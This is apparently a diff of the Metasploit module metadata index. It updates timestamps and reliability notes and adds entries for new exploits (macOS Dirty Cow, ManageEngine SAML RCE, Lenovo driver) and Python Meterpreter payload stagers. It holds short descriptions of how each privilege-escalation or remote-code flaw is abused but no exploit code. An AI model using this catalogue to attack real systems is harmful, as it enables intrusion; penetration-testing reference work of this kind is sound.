+    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n          versions 1.19.0 < 1.20.3.\n\n          A permission check flaw exists for -modulepath and -logfile options when\n          starting Xorg.  This allows unprivileged users that can start the server\n          the ability to elevate privileges and run arbitrary code under root\n          privileges.\n\n          This module has been tested with CentOS 7 (1708).\n          CentOS default install will require console auth for the users session.\n          Xorg must have SUID permissions and may not start if running.\n\n          On successful exploitation artifacts will be created consistant\n          with starting Xorg.",
    "references": [
      "CVE-2018-14665",
      "BID-105741",
@@ -97809,7 +99280,7 @@
      "Solaris x86",
      "Solaris x64"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb",
    "is_install_path": true,
    "ref_name": "multi/local/xorg_x11_suid_server_modulepath",
@@ -97817,6 +99288,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -98369,7 +99849,7 @@
      "Linux (Command)",
      "AIX (Command)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/multi/misc/ibm_tm1_unauth_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/ibm_tm1_unauth_rce",
@@ -98377,6 +99857,17 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": false,
    "needs_cleanup": true
@@ -101315,7 +102806,7 @@
      "Qualys",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n        dynamic loader (CVE-2019-19726).\n\n        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n        environment variable when set with approximately `ARG_MAX` colons.\n\n        This can be abused to load `libutil.so` from an untrusted path,\n        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n        executable, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        OpenBSD 6.1 (amd64); and\n        OpenBSD 6.6 (amd64)",
+    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n          dynamic loader (CVE-2019-19726).\n\n          The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n          environment variable when set with approximately `ARG_MAX` colons.\n\n          This can be abused to load `libutil.so` from an untrusted path,\n          using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n          executable, resulting in privileged code execution.\n\n          This module has been tested successfully on:\n\n          OpenBSD 6.1 (amd64); and\n          OpenBSD 6.6 (amd64)",
    "references": [
      "CVE-2019-19726",
      "EDB-47780",
@@ -101337,7 +102828,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
    "is_install_path": true,
    "ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
@@ -101345,6 +102836,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell"
@@ -102340,6 +103840,63 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_osx/local/mac_dirty_cow": {
+    "name": "macOS Dirty Cow Arbitrary File Write Local Privilege Escalation",
+    "fullname": "exploit/osx/local/mac_dirty_cow",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-12-17",
+    "type": "exploit",
+    "author": [
+      "Ian Beer",
+      "Zhuowei Zhang",
+      "timwr"
+    ],
+    "description": "An app may be able to execute arbitrary code with kernel privileges",
+    "references": [
+      "CVE-2022-46689",
+      "URL-https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c",
+      "URL-https://github.com/zhuowei/MacDirtyCowDemo"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Mac OS X x64 (Native Payload)"
+    ],
+    "mod_time": "2023-02-02 13:29:43 +0000",
+    "path": "/modules/exploits/osx/local/mac_dirty_cow.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/mac_dirty_cow",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_osx/local/nfs_mount_root": {
    "name": "Mac OS X NFS Mount Privilege Escalation Exploit",
    "fullname": "exploit/osx/local/nfs_mount_root",
@@ -102938,7 +104495,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-02 18:46:08 +0000",
    "path": "/modules/exploits/osx/local/vmware_fusion_lpe.rb",
    "is_install_path": true,
    "ref_name": "osx/local/vmware_fusion_lpe",
@@ -102946,6 +104503,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -103192,7 +104758,7 @@
      "Tim Brown",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n        systems by exploiting the ifwatchd suid executable.\n\n        ifwatchd allows users to specify scripts to execute using the '-A'\n        command line argument; however, it does not drop privileges when\n        executing user-supplied scripts, resulting in execution of arbitrary\n        commands as root.\n\n        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n        and 6.5.0 SP1 (x86).",
+    "description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n          systems by exploiting the ifwatchd suid executable.\n\n          ifwatchd allows users to specify scripts to execute using the '-A'\n          command line argument; however, it does not drop privileges when\n          executing user-supplied scripts, resulting in execution of arbitrary\n          commands as root.\n\n          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n          and 6.5.0 SP1 (x86).",
    "references": [
      "CVE-2014-2533",
      "BID-66449",
@@ -103211,7 +104777,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "qnx/local/ifwatchd_priv_esc",
@@ -103219,6 +104785,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -103240,7 +104815,7 @@
      "Mor!p3r",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n        The QNX qconn daemon does not require authentication and allows\n        remote users to execute arbitrary operating system commands.\n\n        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n        and 6.5.0 SP1 (x86).",
+    "description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n          The QNX qconn daemon does not require authentication and allows\n          remote users to execute arbitrary operating system commands.\n\n          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n          and 6.5.0 SP1 (x86).",
    "references": [
      "EDB-21520",
      "URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
@@ -103259,7 +104834,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-01 20:51:44 +0000",
    "path": "/modules/exploits/qnx/qconn/qconn_exec.rb",
    "is_install_path": true,
    "ref_name": "qnx/qconn/qconn_exec",
@@ -103267,6 +104842,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -105838,7 +107422,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-01-21 19:59:29 +0000",
+    "mod_time": "2023-02-05 15:45:30 +0000",
    "path": "/modules/exploits/unix/local/at_persistence.rb",
    "is_install_path": true,
    "ref_name": "unix/local/at_persistence",
@@ -105846,6 +107430,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
    },
    "session_types": [

@@ -105885,7 +107479,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-01-21 19:59:29 +0000",
+    "mod_time": "2023-02-05 15:45:30 +0000",
    "path": "/modules/exploits/unix/local/chkrootkit.rb",
    "is_install_path": true,
    "ref_name": "unix/local/chkrootkit",
@@ -105893,6 +107487,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -105935,7 +107538,7 @@
    "targets": [
      "/usr/lib/crontab.local"
    ],
-    "mod_time": "2021-02-05 12:15:44 +0000",
+    "mod_time": "2023-02-05 15:45:30 +0000",
    "path": "/modules/exploits/unix/local/emacs_movemail.rb",
    "is_install_path": true,
    "ref_name": "unix/local/emacs_movemail",
@@ -105943,6 +107546,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell"
@@ -105980,7 +107592,7 @@
    "targets": [
      "Exim < 4.86.2"
    ],
-    "mod_time": "2021-01-21 19:59:29 +0000",
+    "mod_time": "2023-02-05 15:45:30 +0000",
    "path": "/modules/exploits/unix/local/exim_perl_startup.rb",
    "is_install_path": true,
    "ref_name": "unix/local/exim_perl_startup",
@@ -105988,6 +107600,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -106027,7 +107648,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2021-01-21 19:59:29 +0000",
+    "mod_time": "2023-02-05 15:45:30 +0000",
    "path": "/modules/exploits/unix/local/netbsd_mail_local.rb",
    "is_install_path": true,
    "ref_name": "unix/local/netbsd_mail_local",
@@ -106035,6 +107656,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "os-resource-loss"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
    },
    "session_types": [
      "shell",
@@ -106125,7 +107756,7 @@
      "Linux x86",
      "BSD x86"
    ],
-    "mod_time": "2022-10-05 19:59:20 +0000",
+    "mod_time": "2023-02-05 15:45:30 +0000",
    "path": "/modules/exploits/unix/local/setuid_nmap.rb",
    "is_install_path": true,
    "ref_name": "unix/local/setuid_nmap",
@@ -142700,7 +144331,7 @@
      "Windows Dropper",
      "Windows Command"
    ],
-    "mod_time": "2021-11-10 11:12:38 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/http/exchange_proxylogon_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/exchange_proxylogon_rce",
@@ -145066,7 +146697,7 @@
      "Windows Command",
      "Windows Powershell"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hpe_sim_76_amf_deserialization",
@@ -146519,6 +148150,73 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966": {
+    "name": "ManageEngine Endpoint Central Unauthenticated SAML RCE",
+    "fullname": "exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-10",
+    "type": "exploit",
+    "author": [
+      "Khoa Dinh",
+      "horizon3ai",
+      "Christophe De La Fuente",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This exploits an unauthenticated remote code execution vulnerability\n          that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10\n          and below (CVE-2022-47966). Due to a dependency to an outdated library\n          (Apache Santuario version 1.4.1), it is possible to execute arbitrary\n          code by providing a crafted `samlResponse` XML to the Endpoint Central\n          SAML endpoint. Note that the target is only vulnerable if it is\n          configured with SAML-based SSO , and the service should be active.",
+    "references": [
+      "CVE-2022-47966",
+      "URL-https://blog.viettelcybersecurity.com/saml-show-stopper/",
+      "URL-https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
+      "URL-https://github.com/horizon3ai/CVE-2022-47966",
+      "URL-https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 8443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows EXE Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2023-01-29 10:06:14 +0000",
+    "path": "/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/manageengine_servicedesk_plus_cve_2021_44077": {
    "name": "ManageEngine ServiceDesk Plus CVE-2021-44077",
    "fullname": "exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077",
@@ -148962,7 +150660,7 @@
      "Windows Command",
      "Windows Powershell"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb",
    "is_install_path": true,
    "ref_name": "windows/http/sharepoint_workflows_xoml",
@@ -152623,7 +154321,7 @@
    "targets": [
      "Windows x86/x64 with x86 payload"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-01-28 09:08:51 +0000",
    "path": "/modules/exploits/windows/local/anyconnect_lpe.rb",
    "is_install_path": true,
    "ref_name": "windows/local/anyconnect_lpe",
@@ -153199,7 +154897,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-09 11:43:20 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_injection_winsxs",
@@ -154098,7 +155796,7 @@
      "bee13oy",
      "timwr"
    ],
-    "description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n            within win32k. The out of bounds write can be used to overwrite the pvbits of a\n            SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n            memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n            This module has been tested against a fully updated Windows 7 x64 SP1. Offsets\n            within the exploit code may need to be adjusted to work with other versions of\n            Windows.",
+    "description": "This module exploits CVE-2020-1054, an out of bounds write reachable from DrawIconEx\n          within win32k. The out of bounds write can be used to overwrite the pvbits of a\n          SURFOBJ. By utilizing this vulnerability to execute controlled writes to kernel\n          memory, an attacker can gain arbitrary code execution as the SYSTEM user.\n\n          This module has been tested against a fully updated Windows 7 x64 SP1. Offsets\n          within the exploit code may need to be adjusted to work with other versions of\n          Windows.",
    "references": [
      "CVE-2020-1054",
      "URL-https://cpr-zero.checkpoint.com/vulns/cprid-2153/",
@@ -154119,7 +155817,7 @@
    "targets": [
      "Windows 7 x64"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_1054_drawiconex_lpe",
@@ -154605,6 +156303,59 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_windows/local/cve_2022_3699_lenovo_diagnostics_driver": {
+    "name": "Lenovo Diagnostics Driver IOCTL memmove",
+    "fullname": "exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2022-11-09",
+    "type": "exploit",
+    "author": [
+      "alfarom256",
+      "jheysel-r7"
+    ],
+    "description": "Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to\n            issue device IOCTLs to perform arbitrary physical/virtual memory read/write.",
+    "references": [
+      "CVE-2022-3699",
+      "URL-https://github.com/alfarom256/CVE-2022-3699/"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2023-01-19 22:16:54 +0000",
+    "path": "/modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2022_3699_lenovo_diagnostics_driver",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "exploit_windows/local/dnsadmin_serverlevelplugindll": {
    "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
    "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
@@ -154992,7 +156743,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/local/lexmark_driver_privesc.rb",
    "is_install_path": true,
    "ref_name": "windows/local/lexmark_driver_privesc",
@@ -156385,7 +158136,7 @@
      "Grant Willcox",
      "timwr"
    ],
-    "description": "This module exploits a NULL pointer dereference vulnerability in\n            MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n            The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n            function does not effectively check the validity of the tagPOPUPMENU\n            objects it processes before passing them on to MNGetpItemFromIndex(),\n            where the NULL pointer dereference will occur.\n\n            This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n            within the solution may need to be adjusted to work with other versions\n            of Windows, such as Windows Server 2008.",
+    "description": "This module exploits a NULL pointer dereference vulnerability in\n          MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n          The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n          function does not effectively check the validity of the tagPOPUPMENU\n          objects it processes before passing them on to MNGetpItemFromIndex(),\n          where the NULL pointer dereference will occur.\n\n          This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n          within the solution may need to be adjusted to work with other versions\n          of Windows, such as Windows Server 2008.",
    "references": [
      "CVE-2019-0808",
      "URL-https://github.com/exodusintel/CVE-2019-0808",
@@ -156405,7 +158156,7 @@
    "targets": [
      "Windows 7 x86"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/local/ntusermndragover.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ntusermndragover",
@@ -157368,7 +159119,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2023-02-08 15:20:32 +0000",
    "path": "/modules/exploits/windows/local/tokenmagic.rb",
    "is_install_path": true,
    "ref_name": "windows/local/tokenmagic",
@@ -164097,7 +165848,7 @@
    "targets": [
      "Windows Universal (x64) - v7.80.3132"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-08 15:46:07 +0000",
    "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -164107,6 +165858,12 @@
    "notes": {
      "Stability": [
        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
      ]
    },
    "session_types": false,
@@ -170345,7 +172102,7 @@
    "author": [
      "thelightcosine"
    ],
-    "description": "This module uses valid credentials to login to the WinRM service\n          and execute a payload. It has two available methods for payload\n          delivery: Powershell 2.0 and VBS CmdStager.\n\n          The module will check if Powershell 2.0 is available, and if so uses\n          that method. Otherwise it falls back to the VBS CmdStager which is\n          less stealthy.\n\n          IMPORTANT: If targeting an x64 system with the Powershell method\n          you MUST select an x64 payload. An x86 payload will never return.",
+    "description": "This module uses valid credentials to login to the WinRM service\n          and execute a payload. It has two available methods for payload\n          delivery: Powershell 2 (and above) and VBS CmdStager.\n\n          The module will check if Powershell is available, and if so uses\n          that method. Otherwise it falls back to the VBS CmdStager which is\n          less stealthy.",
    "references": [
      "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx"
    ],
@@ -170373,14 +172130,24 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2021-01-29 11:17:38 +0000",
+    "mod_time": "2023-01-03 11:26:07 +0000",
    "path": "/modules/exploits/windows/winrm/winrm_script_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/winrm/winrm_script_exec",
    "check": false,
-    "post_auth": true,
+    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -186284,6 +188051,594 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_cmd/windows/python/meterpreter/bind_tcp": {
+    "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/bind_tcp_uuid": {
+    "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "OJ Reeves"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_http": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_https": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_tcp": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
+      "RageLtMan"
+    ],
+    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-01-20 14:53:59 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/python.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": {
+    "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
